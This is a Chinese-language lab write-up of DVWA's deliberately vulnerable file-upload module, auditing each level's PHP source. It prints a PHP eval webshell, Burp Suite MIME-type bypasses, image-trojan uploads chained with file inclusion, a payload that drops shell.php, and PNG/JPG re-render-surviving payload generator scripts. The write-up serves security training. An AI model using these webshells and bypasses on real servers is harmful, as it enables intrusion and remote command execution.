DVWA靶场-File Upload(文件上传)

blog 444
DVWA靶场-File Upload(文件上传)

0x01 等级:Low

直接上源码


<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // 向页面输出文件保存的路径
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    // 获取上传的文件名
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // 将上传的文件剪切到我们$target_path指定的路径
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // 上传失败说的话
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // 上传成功说的话
        echo "<pre>{$target_path} succesfully uploaded!</pre>";
    }
}

?>

通过审计代码发现,并没有对上传的文件类型进行限制。也就是说,可以上传任意文件

编辑cmd.php文件进行上传。文件内容为一句话木马

<?php @eval($_POST['cmd']);?> 
DVWA靶场-File Upload(文件上传)

发现上传成功。文件上传之后页面显示了保存的路径

DVWA靶场-File Upload(文件上传)

尝试访问我们的一句话木马

发现访问成功(因为cmd.php中并没有输出文字,所以页面为空白)

DVWA靶场-File Upload(文件上传)

尝试使用中国蚁剑或者中国菜刀连接。发现连接成功

DVWA靶场-File Upload(文件上传)

0x02 等级:Medium

直接看源码


<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // 上传成功地文件保存地路径
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    // 文件保存路径和文件名进行拼接 形成一个完整地路径+文件名
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // 获取完整地文件名
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    // 获取文件地MIME类型
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    // 获取文件地大小
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

    // 通过MIME判断文件是否为图片 程序员地理想是只允许上传jpg、png、gif、且文件小于1M才能上传成功
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {

        // 将文件剪切到$target_path指定的路径
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // 剪切错误说的话
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // 剪切成功说的话
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // 上传了不允许的MIME说的话
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>

通过审计代码发现,它只是对文件地MIME类型进行限制。

MIME即(多用途互联网邮件扩展类型)

MIME(Multipurpose Internet Mail Extensions)多用途互联网邮件扩展类型。是设定某种扩展名的文件用一种应用程序来打开的方式类型,当该扩展名文件被访问的时候,浏览器会自动使用指定应用程序来打开。多用于指定一些客户端自定义的文件名,以及一些媒体文件打开方式。
.jpg的MIME为image/jpeg

.png的MIME为image/png

.gif的MIME为image/gif

.txt的MIME为text/plain
.php的MIME为text/php

他们再HTTP协议中以Content-Type字段定义。

于是我们将.php文件地MIME修改为图片的MIME即可绕过

使用burpsuite拦截数据包(不了解的可以自行百度)

修改前的MIME即Content-type:text/php

DVWA靶场-File Upload(文件上传)

修改之后的MIME即Content-Type: image/jpeg

之后点击Forward放包即可

DVWA靶场-File Upload(文件上传)

之后返回页面发现上传成功。并且在页面回显了保存路径

DVWA靶场-File Upload(文件上传)

尝试访问发现访问成功。

DVWA靶场-File Upload(文件上传)

0x03 等级:Hight


<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    // 获取文件地后缀名。比如上传的文件名为123.php那么获取的就为php
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // 对用户上传的文件名进行审核。如何后缀名不为jpg和jpeg以及png并且不大于1M并且获取图片的宽高大小以及属性如果不符合则则不会上传成功,反则上传成功。
   if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // 如果上传的文件不是图片的后缀则输出下面这句话
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>

strrpos(string,find,start) 函数返回字符串 find 在另一字符串 string 中最后一次出现的位置,如果没有找到字符串则返回 false,可选参数 start 规定在何处开始搜索getimagesize(string filename) 函数会通过读取文件头,返回图片的长、宽等信息,如果没有相关的图片文件头则报错。源码通过字符串匹配来确定文件后缀名,并且查看文件的相关参数提高了过滤的强度

很明显,这是一个基于白名单的限制(只允许上传某个后缀的文件)

只允许上传后缀为png或jpeg以及jpg的图片。并且大小不大于1M。以及必须符合getimagesize函数的特征。

一般绕过规则为MIME绕过00截断(包含%00截断和0x00截断以及0x0a截断)图片木马配合文件包含

但是经过测试00截断均不行

于是我们尝试使用图片木马进行上传

我们先上传一个符合条件的图片。不大于1M

DVWA靶场-File Upload(文件上传)

之后在其文件内容的后方添加一句话木马<?php @eval($_POST[cmd]);?>

DVWA靶场-File Upload(文件上传)

之后可以发现。上传成功。但是后缀是一个.png结尾的图片文件。而中国菜刀或中国蚁剑的原理向上传文件发送包含参数的 post 请求,通过控制参数来执行不同的命令。这里服务器将木马文件解析成了图片文件,因此向其发送 post 请求时,服务器并不会执行相应命令

DVWA靶场-File Upload(文件上传)

于是我们这里想到了前面的文件包含。它的特性是如果被包含的文件内容中有符合php语法结构的语句。那么它会交给PHP程序执行。于是我们的.png结尾的一句话木马文件。通过文件包含可以执行相应的命令

http://172.16.1.200/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/test.png
DVWA靶场-File Upload(文件上传)

可以发现文件包成功包含。于是我们尝试使用中国蚁剑进行连接

发现实际并不能通过文件包含的形式直接连接。

DVWA靶场-File Upload(文件上传)

其实我们这里可以通过传参的方式。执行任意系统命令以及函数

由于是POST请求的方式传参。我们可以使用HackBar插件

DVWA靶场-File Upload(文件上传)

我们也可以w使用小马生大马的方式进行尝试

思路:上传一个经过我们处理后的png文件,文件的内容除了图片信息以外有我们附加的php代码。代码的功能就是,当我们通过文件包含访问这个png的时候。它会在某个目录下新建一个文件。而文件名为shell.php。内容则为一句话木马。

构造Payload:

<?php 
    $file = 'shell.php';  # 新建文件的文件名
    $text = '<?php @eval$_POST[cmd]);?>';  # 文件地内容为一句话木马
    file_put_contents($file,$text);  # 新建这个文件
?>

在文件内容的末尾增加我们的payload

DVWA靶场-File Upload(文件上传)
DVWA靶场-File Upload(文件上传)

上传成功之后。我们通过文件包含访问这个页面

http://172.16.1.200/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/payload.png
DVWA靶场-File Upload(文件上传)

包含成功地同时也会生成一个shell.php的文件。

shell.php默认生成在当前文件包含页面的目录下。也就是http://172.16.1.200/dvwa/vulnerabilities/fi/目录下。我们可以通过http://172.16.1.200/dvwa/vulnerabilities/fi/shell.php访问。

DVWA靶场-File Upload(文件上传)

发现访问成功。于是我们再次尝试使用中国蚁剑连接。发现连接成功

DVWA靶场-File Upload(文件上传)

0x04 等级: impossible

以下是对impossible级别源码的审计。

DVWA靶场-File Upload(文件上传)

通过审计发现,源码使用imagecreatefromjpeg()imagecreatefrompng()函数,这两个函数的作用就是,根据我们上传的图片。生成一个新的图片。如果我们上传的是图片马,那么会将我们的PHP代码部分删除。

我们尝试上传一个shell.png文件。其文件内容的最后一行有我们的PHP代码。

DVWA靶场-File Upload(文件上传)

我们上传之后查看效果。

发现上传成功

DVWA靶场-File Upload(文件上传)

将我们上传成功地图片,保存到本地,使用十六进制编辑器打开进行分析。

分析发现,我们的PHP代码被删除了。而这张图片就是由imagecreatefrompng()函数生成的。

DVWA靶场-File Upload(文件上传)

这种操作我们一般称之为二次渲染,它会根据我们上传的图片,取图片里面的数据,生成一个新的图片。之后将我们的图片删除。

之后,我们的图片马就失效了,但不完全失效。。

0x04.2 上传png图片马

我们通过写入IDAT数据块,这里有国外大牛写的脚本,直接拿来运行即可。

这是是PHP脚本,可以直接使用php程序运行,或者放到服务器里面运行,运行之后得到1.png文件,上传即可。

<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
           0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
           0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
           0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
           0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
           0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
           0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
           0x66, 0x44, 0x50, 0x33);



$img = imagecreatetruecolor(32, 32);

for ($y = 0; $y < sizeof($p); $y += 3) {
   $r = $p[$y];
   $g = $p[$y+1];
   $b = $p[$y+2];
   $color = imagecolorallocate($img, $r, $g, $b);
   imagesetpixel($img, round($y / 3), 0, $color);
}

imagepng($img,'./1.png');
?>

上传成功之后,我们将其下载,丢到十六进制编辑器中打开

DVWA靶场-File Upload(文件上传)

可以发现,经过二次渲染之后,还是可以隐写图片马的。

DVWA靶场-File Upload(文件上传)

但是我这里尝试文件包含,发现语法报错

DVWA靶场-File Upload(文件上传)

暂时没有利用成功,而且它代码使用$_GET传参0还有一个$_POST传参1,但是他们二者穿进去的是字符串类型的,字符串类型是不能作为语法解析的。除非使用eval()函数,这里暂时没有利用成功。

0x04.2 上传jpg图片马

<?php
    $miniPayload = "<?=phpinfo();?>";


    if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) {
        die('php-gd is not installed');
    }

    if(!isset($argv[1])) {
        die('php jpg_payload.php <jpg_name.jpg>');
    }

    set_error_handler("custom_error_handler");

    for($pad = 0; $pad < 1024; $pad++) {
        $nullbytePayloadSize = $pad;
        $dis = new DataInputStream($argv[1]);
        $outStream = file_get_contents($argv[1]);
        $extraBytes = 0;
        $correctImage = TRUE;

        if($dis->readShort() != 0xFFD8) {
            die('Incorrect SOI marker');
        }

        while((!$dis->eof()) && ($dis->readByte() == 0xFF)) {
            $marker = $dis->readByte();
            $size = $dis->readShort() - 2;
            $dis->skip($size);
            if($marker === 0xDA) {
                $startPos = $dis->seek();
                $outStreamTmp = 
                    substr($outStream, 0, $startPos) . 
                    $miniPayload . 
                    str_repeat("\0",$nullbytePayloadSize) . 
                    substr($outStream, $startPos);
                checkImage('_'.$argv[1], $outStreamTmp, TRUE);
                if($extraBytes !== 0) {
                    while((!$dis->eof())) {
                        if($dis->readByte() === 0xFF) {
                            if($dis->readByte !== 0x00) {
                                break;
                            }
                        }
                    }
                    $stopPos = $dis->seek() - 2;
                    $imageStreamSize = $stopPos - $startPos;
                    $outStream = 
                        substr($outStream, 0, $startPos) . 
                        $miniPayload . 
                        substr(
                            str_repeat("\0",$nullbytePayloadSize).
                                substr($outStream, $startPos, $imageStreamSize),
                            0,
                            $nullbytePayloadSize+$imageStreamSize-$extraBytes) . 
                                substr($outStream, $stopPos);
                } elseif($correctImage) {
                    $outStream = $outStreamTmp;
                } else {
                    break;
                }
                if(checkImage('payload_'.$argv[1], $outStream)) {
                    die('Success!');
                } else {
                    break;
                }
            }
        }
    }
    unlink('payload_'.$argv[1]);
    die('Something\'s wrong');

    function checkImage($filename, $data, $unlink = FALSE) {
        global $correctImage;
        file_put_contents($filename, $data);
        $correctImage = TRUE;
        imagecreatefromjpeg($filename);
        if($unlink)
            unlink($filename);
        return $correctImage;
    }

    function custom_error_handler($errno, $errstr, $errfile, $errline) {
        global $extraBytes, $correctImage;
        $correctImage = FALSE;
        if(preg_match('/(\d+) extraneous bytes before marker/', $errstr, $m)) {
            if(isset($m[1])) {
                $extraBytes = (int)$m[1];
            }
        }
    }

    class DataInputStream {
        private $binData;
        private $order;
        private $size;

        public function __construct($filename, $order = false, $fromString = false) {
            $this->binData = '';
            $this->order = $order;
            if(!$fromString) {
                if(!file_exists($filename) || !is_file($filename))
                    die('File not exists ['.$filename.']');
                $this->binData = file_get_contents($filename);
            } else {
                $this->binData = $filename;
            }
            $this->size = strlen($this->binData);
        }

        public function seek() {
            return ($this->size - strlen($this->binData));
        }

        public function skip($skip) {
            $this->binData = substr($this->binData, $skip);
        }

        public function readByte() {
            if($this->eof()) {
                die('End Of File');
            }
            $byte = substr($this->binData, 0, 1);
            $this->binData = substr($this->binData, 1);
            return ord($byte);
        }

        public function readShort() {
            if(strlen($this->binData) < 2) {
                die('End Of File');
            }
            $short = substr($this->binData, 0, 2);
            $this->binData = substr($this->binData, 2);
            if($this->order) {
                $short = (ord($short[1]) << 8) + ord($short[0]);
            } else {
                $short = (ord($short[0]) << 8) + ord($short[1]);
            }
            return $short;
        }

        public function eof() {
            return !$this->binData||(strlen($this->binData) === 0);
        }
    }
?>

食用方法:先准备一个jpg格式的图片,先上传的服务器,之后再保存的本地。

运行脚本

执行命令

php 123.php 123.jpg

其中123.php为脚本名称 123.jpg为图片名称
DVWA靶场-File Upload(文件上传)

经过测试,上传之后,经过二次渲染,还是会把PHP代码内容去除掉。

大家可以去尝试以下。

分享